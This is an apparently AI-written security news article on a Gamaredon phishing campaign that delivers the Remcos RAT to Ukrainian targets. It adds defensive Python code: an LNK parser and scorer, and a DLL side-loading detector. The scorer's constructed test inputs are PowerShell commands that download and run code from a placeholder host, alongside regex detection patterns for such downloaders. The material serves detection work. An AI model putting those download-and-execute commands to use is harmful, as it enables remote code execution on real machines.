

Ethical Hacking News

Russia-Linked Gamaredon Targets Ukraine with Sophisticated Remcos RAT Campaign



Russia-linked Gamaredon is targeting Ukraine with a phishing campaign that uses troop-related lures and a PowerShell downloader to deploy the Remcos RAT, a notable departure from the group's usual custom tooling.

  • Russia-linked Gamaredon is targeting Ukraine with a phishing campaign that delivers the Remcos RAT through a PowerShell downloader.
  • The group's spear-phishing targets Ukrainian entities and organizations involved in Ukrainian affairs.
  • The lures reference troop movements and get users to open malicious LNK files; the embedded PowerShell contacts geo-fenced servers hosted in Russia and Germany to fetch a ZIP archive containing the Remcos backdoor.
  • Gamaredon usually relies on custom scripts and tools; the use of the commodity Remcos RAT, delivered through DLL side-loading with the payload stored encrypted inside the ZIP, is a departure from that pattern.



  • The Russia-linked group Gamaredon is targeting Ukraine with a phishing campaign that uses troop-related lures to deploy the Remcos RAT via a PowerShell downloader. The cyberespionage group, also tracked as Armageddon, Primitive Bear and ACTINIUM, has a long record of spear-phishing Ukrainian entities and organizations related to Ukrainian affairs.

    The campaign chains several tactics, techniques and procedures (TTPs). The phishing lures reference troop movements to get users to open malicious LNK files. Opening the shortcut runs the PowerShell code embedded in it, which acts as a downloader: it contacts geo-fenced servers hosted in Russia and Germany and retrieves a ZIP archive containing the Remcos backdoor.

    Gamaredon usually relies on custom scripts and tools, but in this campaign it has been observed deploying the widely available Remcos RAT. Remcos itself is a commodity remote-access tool; what helps this campaign evade detection is the delivery chain around it: the final payload is stored encrypted inside the ZIP archive and is loaded through DLL side-loading rather than executed directly.

    According to researchers at Cisco Talos, the LNK files are distributed compressed inside ZIP archives, usually disguised as Office documents and named after topics related to the military invasion. The campaign has been active since at least November 2024. The download servers are geo-fenced: they responded only to requests originating from Ukraine and returned HTTP 403 errors to connections from elsewhere, which also hinders analysis from outside the country.
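    The first link in the chain is a shortcut whose command line launches PowerShell. The parser and scorer below is an added example, not code from Cisco Talos or Ethical Hacking News: it reads the StringData of a Windows .lnk file following the MS-SHLLINK layout, decodes any -EncodedCommand payload, and scores the target and arguments for downloader traits (hidden window, policy bypass, web download, ZIP extraction, %TEMP%). The LNK bytes are constructed in the block, http://example.invalid is a placeholder host, and the patterns and weights are this example's own heuristics, not the published Snort rules.

```python
"""Parse a Windows .lnk (Shell Link) and score its command line for
PowerShell-downloader traits. Added example; LNK bytes are constructed here,
example.invalid is a placeholder, and the heuristics are this example's own."""
import base64
import re
import struct

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
SHELL_LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))

# (pattern, weight, label): traits of a shortcut-launched PowerShell downloader
SUSPICIOUS = (
    (r"\bpowershell(?:\.exe)?\b|\bpwsh\b", 1, "powershell host"),
    (r"-(?:w|windowstyle)\s+hidden", 2, "hidden window"),
    (r"-(?:nop|noprofile)\b", 1, "no profile"),
    (r"-(?:ep|executionpolicy)\s+bypass", 2, "execution policy bypass"),
    (r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", 3, "encoded command"),
    (r"\biex\b|invoke-expression", 3, "invoke-expression"),
    (r"net\.webclient|download(?:string|file)|invoke-webrequest|\biwr\b", 3, "download"),
    (r"expand-archive|\.zip\b", 2, "zip extraction"),
    (r"\$env:temp|%temp%|\\appdata\\local\\temp", 1, "temp path"),
)


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a Shell Link; raise ValueError if it is not one."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("bad HeaderSize")
    if data[4:20] != SHELL_LINK_CLSID:
        raise ValueError("bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:  # IDListSize (2 bytes) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:            # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    for bit, key in STRING_FIELDS:       # CountCharacters + chars, in fixed order
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        raw = data[pos:pos + (count * 2 if unicode else count)]
        pos += len(raw)
        fields[key] = raw.decode("utf-16-le" if unicode else "cp1252", "replace")
    return fields


def decode_encoded_command(args: str) -> str:
    """-EncodedCommand carries base64 of a UTF-16LE script; return it decoded or ''."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", args, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyze_lnk(data: bytes) -> dict:
    """Parse, decode any encoded command, and score target path plus arguments."""
    fields = parse_lnk(data)
    decoded = decode_encoded_command(fields.get("arguments", ""))
    text = "\n".join((fields.get("relative_path", ""), fields.get("arguments", ""), decoded))
    hits, score = [], 0
    for pat, weight, label in SUSPICIOUS:
        if re.search(pat, text, re.I):
            hits.append(label)
            score += weight
    return {**fields, "decoded": decoded, "hits": hits, "score": score}


def build_lnk(arguments: str, relative_path: str) -> bytes:
    """Build a minimal Shell Link carrying only StringData (constructed test input)."""
    header = struct.pack("<I", 0x4C) + SHELL_LINK_CLSID
    header += struct.pack("<I", IS_UNICODE | HAS_RELATIVE_PATH | HAS_ARGUMENTS)
    header = header.ljust(0x4C, b"\x00")  # attributes, timestamps, sizes left zero

    def s(v: str) -> bytes:
        return struct.pack("<H", len(v)) + v.encode("utf-16-le")

    return header + s(relative_path) + s(arguments)


POWERSHELL = r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed stand-in for a lure's command line (placeholder host, not a real IoC)
MALICIOUS_ARGS = ('-w hidden -nop -ep bypass -c "$z=\\"$env:TEMP\\doc.zip\\";'
                  'iwr http://example.invalid/doc -OutFile $z;'
                  'Expand-Archive $z $env:TEMP -Force;'
                  'Start-Process \\"$env:TEMP\\TivoDiag.exe\\""')
ENCODED_ARGS = "-w hidden -enc " + base64.b64encode(
    'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/s")'
    .encode("utf-16-le")).decode()

if __name__ == "__main__":
    for args, target in ((MALICIOUS_ARGS, POWERSHELL), (ENCODED_ARGS, POWERSHELL),
                         (r"C:\Users\Public\notes.txt", r"..\..\Windows\System32\notepad.exe")):
        r = analyze_lnk(build_lnk(args, target))
        print(r["score"], r["hits"])
```

    Real lures usually carry a LinkTargetIDList rather than a relative path, which the parser skips over correctly; the target then has to be recovered from the IDList, so scoring the arguments alone is the robust part. Scanning the LNK inside the ZIP before extraction catches the lure regardless of the Office-document disguise.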

    The PowerShell downloader saves the ZIP archive and extracts it into the %TEMP% folder. The archive holds a legitimate application together with a malicious DLL; when the application runs, it loads that DLL through DLL side-loading. The DLL acts as a loader, decrypting and executing the final Remcos payload.

    Abusing a legitimate application for DLL side-loading is another hallmark of this campaign. The sample analyzed on Any.run contained the clean application TivoDiag.exe along with two DLLs, one malicious and one benign. The malicious DLL, mindclient.dll, is loaded when TivoDiag.exe executes.
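    The side-loading step leaves a recognizable trace in image-load telemetry: an executable running from a user-writable folder loads a DLL from that same folder. The detector below is an added example, not code from Cisco Talos or Ethical Hacking News. It runs a rule over records constructed in the shape of Sysmon Event ID 7 (Image, ImageLoaded, Signed, SignatureStatus); the Signed values assigned to mindclient.dll and to the benign companion (named support.dll here), the directory list and the rule itself are this example's assumptions, not observations about the real sample.

```python
"""Flag DLL side-loading from image-load events: a host EXE in a user-writable
directory loading an unsigned or badly signed DLL from the same directory.
Added example; events are constructed, signatures are assumed."""
from __future__ import annotations

from pathlib import PureWindowsPath

# Directories a standard user can write to (this example's list, not exhaustive)
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\downloads\\",
                 "\\users\\public\\", "\\programdata\\")


def in_user_writable(path: str) -> bool:
    return any(marker in path.lower() for marker in USER_WRITABLE)


def classify(ev: dict) -> str | None:
    """Return an alert reason for one image-load event, or None if it looks benign."""
    exe, dll = PureWindowsPath(ev["Image"]), PureWindowsPath(ev["ImageLoaded"])
    if dll.suffix.lower() != ".dll":
        return None
    # Side-loading means the DLL came from the executable's own directory...
    if str(exe.parent).lower() != str(dll.parent).lower():
        return None
    # ...and that directory is one an attacker could have dropped the pair into.
    if not in_user_writable(str(exe)):
        return None
    if ev.get("Signed", "false").lower() != "true":
        return "unsigned DLL loaded from user-writable directory beside its host EXE"
    if ev.get("SignatureStatus", "") != "Valid":
        return f"DLL with {ev['SignatureStatus']} signature loaded beside its host EXE"
    return None


def detect(events: list[dict]) -> list[tuple[str, str, str]]:
    """Run classify over a batch; return (Image, ImageLoaded, reason) triples."""
    return [(ev["Image"], ev["ImageLoaded"], why)
            for ev in events if (why := classify(ev))]


TEMP = r"C:\Users\alice\AppData\Local\Temp"
# Constructed events; which DLLs are signed is an assumption made for the example.
EVENTS = [
    {"Image": TEMP + r"\TivoDiag.exe", "ImageLoaded": TEMP + r"\mindclient.dll",
     "Signed": "false", "SignatureStatus": "Unavailable"},      # side-loaded loader
    {"Image": TEMP + r"\TivoDiag.exe", "ImageLoaded": TEMP + r"\support.dll",
     "Signed": "true", "SignatureStatus": "Valid"},             # benign companion DLL
    {"Image": TEMP + r"\TivoDiag.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll",
     "Signed": "true", "SignatureStatus": "Valid"},             # normal system import
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ImageLoaded": r"C:\Windows\System32\comctl32.dll",
     "Signed": "true", "SignatureStatus": "Valid"},             # not user-writable
]

if __name__ == "__main__":
    for image, loaded, why in detect(EVENTS):
        print(f"ALERT {image} -> {loaded}: {why}")
```

    Only the mindclient.dll load trips the rule; the signed companion DLL and the System32 imports do not. Pairing this with the preceding process-creation event (PowerShell launched from explorer.exe via a shortcut, writing a ZIP into %TEMP%) turns a single image-load hit into the full chain described above.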

    Talos has published indicators of compromise (IoCs) and Snort rules for detecting this activity. Beyond the published indicators, defenders can watch for the chain itself: shortcut-launched PowerShell writing a ZIP archive into %TEMP%, followed by an unfamiliar executable in %TEMP% loading a DLL from the same directory. The campaign underscores the persistent threat that state-aligned actors pose to Ukraine and the need for continued vigilance against phishing-led intrusions.



    Related Information:
  • https://www.ethicalhackingnews.com/articles/Russia-Linked-Gamaredon-Targets-Ukraine-with-Sophisticated-Remcos-RAT-Campaign-ehn.shtml

  • Published: Mon Mar 31 09:40:36 2025 by llama3.2 3B Q4_K_M















    © Ethical Hacking News. All rights reserved.
